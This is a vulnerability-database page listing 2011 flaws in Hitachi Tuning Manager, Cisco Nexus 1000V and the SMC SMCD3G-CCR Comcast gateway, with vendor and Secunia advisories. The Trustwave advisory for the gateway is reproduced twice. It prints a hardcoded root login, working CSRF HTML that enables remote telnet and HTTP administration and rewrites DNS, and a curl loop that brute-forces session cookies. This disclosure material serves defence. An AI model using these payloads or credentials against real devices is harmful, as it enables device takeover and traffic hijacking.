VARIoT IoT vulnerabilities database
| VAR-201102-0385 | No CVE | Hitachi Tuning Manager Unknown Cross-Site Scripting Vulnerability |
CVSS V2: - CVSS V3: - Severity: LOW |
Hitachi Tuning Manager is an automated, intelligent and path-aware storage resource management software that monitors, analyzes and audits the performance of storage network resources from applications to storage devices. Hitachi Tuning Manager has multiple input validation issues, and remote attackers can exploit vulnerabilities for cross-site scripting attacks to obtain sensitive information or hijack target user sessions.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Hitachi Tuning Manager versions 6.0.0 through 6.4.0-01 and 7.0.0 are vulnerable. ----------------------------------------------------------------------
Secure your corporate defenses and reduce complexity in handling vulnerability threats with the new Secunia Vulnerability Intelligence Manager (VIM).
Request a free trial:
http://secunia.com/products/corporate/vim/
----------------------------------------------------------------------
TITLE:
Hitachi Tuning Manager Cross-Site Scripting Vulnerability
SECUNIA ADVISORY ID:
SA43209
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/43209/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=43209
RELEASE DATE:
2011-02-08
DISCUSS ADVISORY:
http://secunia.com/advisories/43209/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/43209/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=43209
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
A vulnerability has been reported in Hitachi Tuning Manager, which
can be exploited by malicious people to conduct cross-site scripting
attacks.
Certain unspecified input is not properly sanitised before being
returned to the user.
The vulnerability is reported in versions 6.0.0 through 6.4.0-01 and
7.0.0 running on Windows and Solaris.
SOLUTION:
Update to version 6.4.0-02 or 7.0.0-01.
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor.
ORIGINAL ADVISORY:
HS11-002:
http://www.hitachi.co.jp/Prod/comp/soft1/security/info/vuls/HS11-002/index.html
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-201102-0213 | CVE-2011-0355 | Cisco Nexus 1000V Virtual Ethernet Module Service disruption in (DoS) Vulnerabilities |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
Cisco Nexus 1000V Virtual Ethernet Module (VEM) 4.0(4) SV1(1) through SV1(3b), as used in VMware ESX 4.0 and 4.1 and ESXi 4.0 and 4.1, does not properly handle dropped packets, which allows guest OS users to cause a denial of service (ESX or ESXi host OS crash) by sending an 802.1Q tagged packet over an access vEthernet port, aka Cisco Bug ID CSCtj17451. The Cisco Nexus 1000V VEM is prone to a denial-of-service vulnerability.
An attacker can exploit this issue to cause the affected application to crash, resulting in a denial-of-service condition.
The following Cisco products are vulnerable:
Cisco Nexus 1000V Virtual Ethernet Module Release 4.0(4) SV1(3b)
Cisco Nexus 1000V Virtual Ethernet Module Release 4.0(4) SV1(3a)
Cisco Nexus 1000V Virtual Ethernet Module Release 4.0(4) SV1(3)
Cisco Nexus 1000V Virtual Ethernet Module Release 4.0(4) SV1(2)
Cisco Nexus 1000V Virtual Ethernet Module Release 4.0(4) SV1(1)
The following VMware products are vulnerable:
ESXi 4.1
ESXi 4.0
ESX 4.1
ESX 4.0. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
- ------------------------------------------------------------------------
VMware Security Advisory
Advisory ID: VMSA-2011-0002
Synopsis: Cisco Nexus 1000V VEM updates address denial of
service in VMware ESX/ESXi
Issue date: 2011-02-07
Updated on: 2011-02-07 (initial release of advisory)
CVE numbers: CVE-2011-0355
- ------------------------------------------------------------------------
1. Summary
Updated versions of the Cisco Nexus 1000V virtual switch address a
denial
of service in VMware ESX/ESXi.
2. Problem Description
a. This switch can be added to ESX and ESXi
where it replaces the VMware virtual switch and runs as part of the
ESX and ESXi kernel.
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CVE-2011-0355 to the issue.
VMware customers are only affected by this vulnerability if they
have chosen to deploy the Cisco Nexus 1000V virtual switch as a
replacement for the VMware vNetwork Standard Switch or the VMware
vNetwork Distributed Switch.
VMware has confirmed that the VMware vNetwork Standard Switch and
the VMware vNetwork Distributed Switch are not affected by the
vulnerability.
The issue is documented by Cisco in Cisco bug ID CSCtj17451 (see
section 5 for a link).
4. References
CVE numbers
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0355
Cisco bug ID CSCtj17451 (registered Cisco customers only)
http://tools.cisco.com/Support/BugToolKit/search/getBugDetails.do?method=fe
tchBugDetails&bugId=CSCtj17451
- ------------------------------------------------------------------------
6.
- -----------------------------------------------------------------------
7. Contact
E-mail list for product security notifications and announcements:
http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce
This Security Advisory is posted to the following lists:
* security-announce at lists.vmware.com
* bugtraq at securityfocus.com
* full-disclosure at lists.grok.org.uk
E-mail: security at vmware.com
PGP key at: http://kb.vmware.com/kb/1055
VMware Security Advisories
http://www.vmware.com/security/advisories
VMware security response policy
http://www.vmware.com/support/policies/security_response.html
General support life cycle policy
http://www.vmware.com/support/policies/eos.html
VMware Infrastructure support life cycle policy
http://www.vmware.com/support/policies/eos_vi.html
Copyright 2011 VMware Inc. All rights reserved.
-----BEGIN PGP SIGNATURE-----
Version: PGP Desktop 9.8.3 (Build 4028)
Charset: utf-8
wj8DBQFNUNTIS2KysvBH1xkRAk1hAJ9iH1j58lM5KrwVaRYccSN3rWaw/wCePyLP
FHYGA7W1DEcKcOFWj7GkuHE=
=srWD
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
. ----------------------------------------------------------------------
Get a tax break on purchases of Secunia Solutions!
If you are a U.S. company, you may be qualified for a tax break for your software purchases. Learn more at:
http://secunia.com/products/corporate/vim/section_179/
----------------------------------------------------------------------
TITLE:
Cisco Nexus 1000V Virtual Switch 802.1Q Tagged Packet Denial of
Service
SECUNIA ADVISORY ID:
SA43084
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/43084/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=43084
RELEASE DATE:
2011-02-09
DISCUSS ADVISORY:
http://secunia.com/advisories/43084/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/43084/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=43084
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
A vulnerability has been reported in Cisco Nexus 1000V, which can be
exploited by malicious people to cause a DoS (Denial of Service).
The vulnerability is caused due to an error when processing 802.1Q
tagged packets. This can be exploited to cause a crash when a virtual
machine sends a packet on a vEthernet port.
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor.
ORIGINAL ADVISORY:
Cisco (CSCtj17451):
http://www.cisco.com/en/US/docs/switches/datacenter/nexus1000/sw/4_0_4_s_v_1_3_c/release/notes/n1000v_rn.html
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-201102-0084 | CVE-2011-0886 | SMC SMCD3G-CCR of Web Cross-site request forgery vulnerability in the interface |
CVSS V2: 6.8 CVSS V3: - Severity: MEDIUM |
Multiple cross-site request forgery (CSRF) vulnerabilities in the web interface on the SMC SMCD3G-CCR (aka Comcast Business Gateway) with firmware before 1.4.0.49.2 allow remote attackers to (1) hijack the intranet connectivity of arbitrary users for requests that perform a login via goform/login, or hijack the authentication of administrators for requests that (2) enable external logins via an mso_remote_enable action to goform/RemoteRange or (3) change DNS settings via a manual_dns_enable action to goform/Basic. Comcast DOCSIS is prone to multiple cross-site request-forgery and security-bypass vulnerabilities in business gateways.
Exploiting these issues may allow a remote attacker to perform certain administrative actions, bypass certain security restrictions, gain unauthorized access to the affected device, or delete certain data. Other attacks are also possible.
Comcast DOCSIS 3.0 is vulnerable; other versions may also be affected. ----------------------------------------------------------------------
Get a tax break on purchases of Secunia Solutions!
If you are a U.S. company, you may be qualified for a tax break for your software purchases. Learn more at:
http://secunia.com/products/corporate/vim/section_179/
----------------------------------------------------------------------
TITLE:
SMC SMCD3G-CCR Two Vulnerabilities
SECUNIA ADVISORY ID:
SA43199
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/43199/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=43199
RELEASE DATE:
2011-03-05
DISCUSS ADVISORY:
http://secunia.com/advisories/43199/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/43199/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=43199
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Two vulnerabilities have been reported in SMC SMCD3G-CCR, which can
be exploited by malicious people to conduct brute force and
cross-site request forgery attacks.
1) The web management application generates session identifiers
incrementally, which can be exploited to brute force a valid session
identifier via the "userid" cookie.
2) The web management application allows users to perform certain
actions via HTTP requests without making proper validity checks to
verify the requests. This can be exploited to e.g. enable management
via Telnet by tricking an administrator into visiting a malicious web
site while being logged-in to the application.
SOLUTION:
Reportedly fixed in firmware version 1.4.0.49.2.
PROVIDED AND/OR DISCOVERED BY:
Zack Fasel and Matthew Jakubowski, Trustwave's SpiderLabs.
ORIGINAL ADVISORY:
Trustwave's SpiderLabs (TWSL2011-002):
https://www.trustwave.com/spiderlabs/advisories/TWSL2011-002.txt
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
. Trustwave's SpiderLabs Security Advisory TWSL2011-001:
Vulnerabilities in Comcast DOCSIS 3.0 Business Gateways
(SMCD3G-CCR)
https://www.trustwave.com/spiderlabs/advisories/TWSL2011-002.txt
Published: 2011-02-04
Version: 1.0
Vendor: Comcast (http://comcast.com) and SMC (http://www.smc.com)
Product: Comcast DOCSIS 3.0 Business Gateway - SMCD3G-CCR
Version affected: Versions prior to 1.4.0.49.2
Product description:
The Comcast DOCSIS 3.0 Business Gateway provides end-user termination of
cable internet services for Comcast Business Class customers with enhanced
services including Network Address Translation (NAT), firewalling, and
Virtual Private Network (VPN) termination.
Credit: Zack Fasel and Matthew Jakubowski of Trustwave's SpiderLabs
Finding 1: Static Credentials
CVE: CVE-2011-0885
All SMCD3G-CCR gateways provided by Comcast have an administrative
login of "mso" with the password of "D0nt4g3tme". These passwords
are not provided as a part of the installation of the device and are
not recommended to be changed, thus the majority of users are unaware
of the default configuration.
With these default credentials, internal attackers can modify device
configurations to leverage more significant attacks, including redirection
of DNS requests, creation of a remote VPN termination point, and
modification of NAT entries. These credentials provide access to the web
interface for management, as well as a telnet interface that provides shell
access to the device. The mso login provides shell as UID 0 (root).
Finding 2: Cross Site Request Forgery (CSRF)
CVE: CVE-2011-0886
SMCD3G-CCR gateways provided by Comcast permit CSRF attacks against
numerous management pages allowing an attacker to embed in a webpage a
malicious request against the gateway's management interface. Through
this, an attacker can modify device configuration and enable remote
administration via a telnet shell and http.
The following Proof of Concept (PoC) connects to the gateway, logs in,
modifies the remote administration to allow any user to connect externally,
and modifies the DNS information.
## smcd3g-csrf-poc.htm
<html>
<body>
<iframe src="./smcd3g-csrf-poc-1.htm" width="1" height="1">
</iframe>
<iframe src="./smcd3g-csrf-poc-2.htm" width="1" height="1">
</iframe>
<iframe src="./smcd3g-csrf-poc-3.htm" width="1" height="1">
</iframe> </body> </html>
## smcd3g-csrf-poc-1.htm
<html>
<body>
<form action="http://10.1.10.1/goform/login" method="post"
name="tF">
<input type="hidden" name="user" value="mso" />
<input type="hidden" name="pws" value="D0nt4g3tme" />
</form> <script> document.tF.submit(); </script> </body>
</html>
## smcd3g-csrf-poc-2.htm
<html>
<body>
<form action="http://10.1.10.1/goform/RemoteRange"
name="RMangement" method="post"> <input type="hidden"
value="feat-admin-remote" name="file"> <input type="hidden"
value="admin/" name="dir"> <input type="hidden"
name="RemoteRange" value="0" /> <input type="hidden"
name="rm_access" value="on" /> <input type="hidden"
name="Remote0" value="0.0.0.0,0.0.0.0,1" /> <input
type="hidden" name="http_port" value="8080" /> <input
type="hidden" name="http_enable" value="on" /> <input
type="hidden" name="http_flag" value="1" /> <input
type="hidden" name="msoremote_enableCheck" value="on" />
<input type="hidden" name="mso_remote_enable" value="1" />
<input type="hidden" name="remote_enable" value="0" />
<input type="hidden" name="https_enable" value="on" />
<input type="hidden" name="https_port" value="8181" />
<input type="hidden" name="https_flag" value="1" /> <input
type="hidden" name="telnet_enable" value="on" /> <input
type="hidden" name="telnet_port" value="2323" /> <input
type="hidden" name="telnet_flag" value="1" /> <input
type="hidden" name="Remote1=" value="" /> </form> </body>
</html> <script>
setTimeout("document.RMangement.submit()",4000);
</script>
</body>
</html>
## smcd3g-csrf-poc-3.htm
<html>
<body>
<form name="WanIPform"
action="http://10.1.10.1/goform/Basic" method="post"> <input
type="hidden" value="feat-wan-ip" name="file"> <input
type="hidden" value="admin/" name="dir"> <input
type="hidden" value="Fixed" name="DNSAssign"> <input
type="hidden" value="0" name="dhcpc_release"> <input
type="hidden" value="0" name="dhcpc_renew"> <input
type="hidden" value="" name="domain_name"> <input
type="hidden" value="" name="WDn"> <input type="hidden"
name="SysName" value="" /> <input type="hidden"
name="manual_dns_enable" value="on" /> <input type="hidden"
name="DAddr" value="4.2.2.1" /> <input type="hidden"
name="DAddr0" value="4" /> <input type="hidden"
name="DAddr1" value="2" /> <input type="hidden"
name="DAddr2" value="2" /> <input type="hidden"
name="DAddr3" value="1" /> <input type="hidden"
name="PDAddr" value="4.2.2.2" /> <input type="hidden"
name="PDAddr0" value="4" /> <input type="hidden"
name="PDAddr1" value="2" /> <input type="hidden"
name="PDAddr2" value="2" /> <input type="hidden"
name="PDAddr3" value="2" /> </form> <script>
setTimeout("document.WanIPform.submit()",5000);
</script>
</body>
</html>
If the PoC was embedded in any web page the targeted user visited while
logged into the device, the attacker would be provided remote
administration in to the gateway device include a telnet shell. This would
allow the attacker to redirect traffic to a malicious end-point.
Finding 3: Weak Session Management
CVE: CVE-2011-0887
SMCD3G-CCR gateways provided by Comcast utilize a predictable value to
validate the active web management portal session. The epoch time of
beginning of the session is stored as a cookie labeled "userid". This
provides a predictable range of session IDs that can be brute-forced.
The following PoC attempts to brute force the session IDs by requesting the
admin page with an incrementing cookie and determining whether it wants to
redirect to login.asp.
## smcd3g-session-poc.sh
#!/bin/bash
start=1267604160
end=1267605960
for (( i=$start; i<=$end; i++)) do if [ `curl -sb userid=$i
http://10.1.10.1/admin/index.asp | grep -c login.asp` -lt
"1" ] then echo "Session ID Found: $i"
fi
if [ $(($i % 100)) -eq "0" ]
then echo "Currently at $i"
fi
done
Through this, an attacker can brute-force the possible valid session IDs.
Sessions do by default expire within 10 minutes, thus the attack window is
limited but can be leveraged with other attack methods.
Vendor Response:
These issues have been addressed as of version 1.4.0.49.2
Remediation Steps:
In order to determine if the correct version is installed, users should
view the "About" link in the management interface. Versions 1.4.0.49.2 and
above have been corrected.
Vendor Communication Timeline:
08/30/10 - Vulnerability disclosed
01/21/11 - Patch Released
02/04/11 - Advisory Published
Revision History:
1.0 Initial publication
References
1. http://www.smc.com/index.cfm?event=viewProduct&pid=1678
About Trustwave:
Trustwave is the leading provider of on-demand and subscription-based
information security and payment card industry compliance management
solutions to businesses and government entities throughout the world. For
organizations faced with today's challenging data security and compliance
environment, Trustwave provides a unique approach with comprehensive
solutions that include its flagship TrustKeeper compliance management
software and other proprietary security solutions. Trustwave has helped
thousands of organizations--ranging from Fortune 500 businesses and large
financial institutions to small and medium-sized retailers--manage
compliance and secure their network infrastructure, data communications and
critical information assets. Trustwave is headquartered in Chicago with
offices throughout North America, South America, Europe, Africa, China and
Australia. For more information, visit https://www.trustwave.com
About Trustwave's SpiderLabs:
SpiderLabs(R) is the advanced security team at Trustwave focused on
application security, incident response, penetration testing, physical
security and security research. The team has performed over a thousand
incident investigations, thousands of penetration tests and hundreds of
application security tests globally. In addition, the SpiderLabs Research
team provides intelligence through bleeding-edge research and proof of
concept tool development to enhance Trustwave's products and services.
https://www.trustwave.com/spiderlabs
Disclaimer:
The information provided in this advisory is provided "as is" without
warranty of any kind. Trustwave disclaims all warranties, either express or
implied, including the warranties of merchantability and fitness for a
particular purpose. In no event shall Trustwave or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
Trustwave or its suppliers have been advised of the possibility of such
damages. Some states do not allow the exclusion or limitation of liability
for consequential or incidental damages so the foregoing limitation may not
apply.
This transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is STRICTLY PROHIBITED. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
| VAR-201102-0085 | CVE-2011-0887 | SMC SMCD3G-CCR of Web Management portal Vulnerable to session hijacking |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
The web management portal on the SMC SMCD3G-CCR (aka Comcast Business Gateway) with firmware before 1.4.0.49.2 uses predictable session IDs based on time values, which makes it easier for remote attackers to hijack sessions via a brute-force attack on the userid cookie. Comcast DOCSIS is prone to multiple cross-site request-forgery and security-bypass vulnerabilities in business gateways.
Exploiting these issues may allow a remote attacker to perform certain administrative actions, bypass certain security restrictions, gain unauthorized access to the affected device, or delete certain data. Other attacks are also possible.
Comcast DOCSIS 3.0 is vulnerable; other versions may also be affected. ----------------------------------------------------------------------
Get a tax break on purchases of Secunia Solutions!
If you are a U.S. company, you may be qualified for a tax break for your software purchases. Learn more at:
http://secunia.com/products/corporate/vim/section_179/
----------------------------------------------------------------------
TITLE:
SMC SMCD3G-CCR Two Vulnerabilities
SECUNIA ADVISORY ID:
SA43199
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/43199/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=43199
RELEASE DATE:
2011-03-05
DISCUSS ADVISORY:
http://secunia.com/advisories/43199/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/43199/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=43199
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Two vulnerabilities have been reported in SMC SMCD3G-CCR, which can
be exploited by malicious people to conduct brute force and
cross-site request forgery attacks.
2) The web management application allows users to perform certain
actions via HTTP requests without making proper validity checks to
verify the requests. This can be exploited to e.g. enable management
via Telnet by tricking an administrator into visiting a malicious web
site while being logged-in to the application.
SOLUTION:
Reportedly fixed in firmware version 1.4.0.49.2.
PROVIDED AND/OR DISCOVERED BY:
Zack Fasel and Matthew Jakubowski, Trustwave's SpiderLabs.
ORIGINAL ADVISORY:
Trustwave's SpiderLabs (TWSL2011-002):
https://www.trustwave.com/spiderlabs/advisories/TWSL2011-002.txt
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
. Trustwave's SpiderLabs Security Advisory TWSL2011-001:
Vulnerabilities in Comcast DOCSIS 3.0 Business Gateways
(SMCD3G-CCR)
https://www.trustwave.com/spiderlabs/advisories/TWSL2011-002.txt
Published: 2011-02-04
Version: 1.0
Vendor: Comcast (http://comcast.com) and SMC (http://www.smc.com)
Product: Comcast DOCSIS 3.0 Business Gateway - SMCD3G-CCR
Version affected: Versions prior to 1.4.0.49.2
Product description:
The Comcast DOCSIS 3.0 Business Gateway provides end-user termination of
cable internet services for Comcast Business Class customers with enhanced
services including Network Address Translation (NAT), firewalling, and
Virtual Private Network (VPN) termination.
Credit: Zack Fasel and Matthew Jakubowski of Trustwave's SpiderLabs
Finding 1: Static Credentials
CVE: CVE-2011-0885
All SMCD3G-CCR gateways provided by Comcast have an administrative
login of "mso" with the password of "D0nt4g3tme". These passwords
are not provided as a part of the installation of the device and are
not recommended to be changed, thus the majority of users are unaware
of the default configuration.
With these default credentials, internal attackers can modify device
configurations to leverage more significant attacks, including redirection
of DNS requests, creation of a remote VPN termination point, and
modification of NAT entries. These credentials provide access to the web
interface for management, as well as a telnet interface that provides shell
access to the device. The mso login provides shell as UID 0 (root).
Finding 2: Cross Site Request Forgery (CSRF)
CVE: CVE-2011-0886
SMCD3G-CCR gateways provided by Comcast permit CSRF attacks against
numerous management pages allowing an attacker to embed in a webpage a
malicious request against the gateway's management interface. Through
this, an attacker can modify device configuration and enable remote
administration via a telnet shell and http.
The following Proof of Concept (PoC) connects to the gateway, logs in,
modifies the remote administration to allow any user to connect externally,
and modifies the DNS information.
## smcd3g-csrf-poc.htm
<html>
<body>
<iframe src="./smcd3g-csrf-poc-1.htm" width="1" height="1">
</iframe>
<iframe src="./smcd3g-csrf-poc-2.htm" width="1" height="1">
</iframe>
<iframe src="./smcd3g-csrf-poc-3.htm" width="1" height="1">
</iframe> </body> </html>
## smcd3g-csrf-poc-1.htm
<html>
<body>
<form action="http://10.1.10.1/goform/login" method="post"
name="tF">
<input type="hidden" name="user" value="mso" />
<input type="hidden" name="pws" value="D0nt4g3tme" />
</form> <script> document.tF.submit(); </script> </body>
</html>
## smcd3g-csrf-poc-2.htm
<html>
<body>
<form action="http://10.1.10.1/goform/RemoteRange"
name="RMangement" method="post"> <input type="hidden"
value="feat-admin-remote" name="file"> <input type="hidden"
value="admin/" name="dir"> <input type="hidden"
name="RemoteRange" value="0" /> <input type="hidden"
name="rm_access" value="on" /> <input type="hidden"
name="Remote0" value="0.0.0.0,0.0.0.0,1" /> <input
type="hidden" name="http_port" value="8080" /> <input
type="hidden" name="http_enable" value="on" /> <input
type="hidden" name="http_flag" value="1" /> <input
type="hidden" name="msoremote_enableCheck" value="on" />
<input type="hidden" name="mso_remote_enable" value="1" />
<input type="hidden" name="remote_enable" value="0" />
<input type="hidden" name="https_enable" value="on" />
<input type="hidden" name="https_port" value="8181" />
<input type="hidden" name="https_flag" value="1" /> <input
type="hidden" name="telnet_enable" value="on" /> <input
type="hidden" name="telnet_port" value="2323" /> <input
type="hidden" name="telnet_flag" value="1" /> <input
type="hidden" name="Remote1=" value="" /> </form> </body>
</html> <script>
setTimeout("document.RMangement.submit()",4000);
</script>
</body>
</html>
## smcd3g-csrf-poc-3.htm
<html>
<body>
<form name="WanIPform"
action="http://10.1.10.1/goform/Basic" method="post"> <input
type="hidden" value="feat-wan-ip" name="file"> <input
type="hidden" value="admin/" name="dir"> <input
type="hidden" value="Fixed" name="DNSAssign"> <input
type="hidden" value="0" name="dhcpc_release"> <input
type="hidden" value="0" name="dhcpc_renew"> <input
type="hidden" value="" name="domain_name"> <input
type="hidden" value="" name="WDn"> <input type="hidden"
name="SysName" value="" /> <input type="hidden"
name="manual_dns_enable" value="on" /> <input type="hidden"
name="DAddr" value="4.2.2.1" /> <input type="hidden"
name="DAddr0" value="4" /> <input type="hidden"
name="DAddr1" value="2" /> <input type="hidden"
name="DAddr2" value="2" /> <input type="hidden"
name="DAddr3" value="1" /> <input type="hidden"
name="PDAddr" value="4.2.2.2" /> <input type="hidden"
name="PDAddr0" value="4" /> <input type="hidden"
name="PDAddr1" value="2" /> <input type="hidden"
name="PDAddr2" value="2" /> <input type="hidden"
name="PDAddr3" value="2" /> </form> <script>
setTimeout("document.WanIPform.submit()",5000);
</script>
</body>
</html>
If the PoC was embedded in any web page the targeted user visited while
logged into the device, the attacker would be provided remote
administration in to the gateway device include a telnet shell. This would
allow the attacker to redirect traffic to a malicious end-point.
Finding 3: Weak Session Management
CVE: CVE-2011-0887
SMCD3G-CCR gateways provided by Comcast utilize a predictable value to
validate the active web management portal session. The epoch time of
beginning of the session is stored as a cookie labeled "userid". This
provides a predictable range of session IDs that can be brute-forced.
The following PoC attempts to brute force the session IDs by requesting the
admin page with an incrementing cookie and determining whether it wants to
redirect to login.asp.
## smcd3g-session-poc.sh
#!/bin/bash
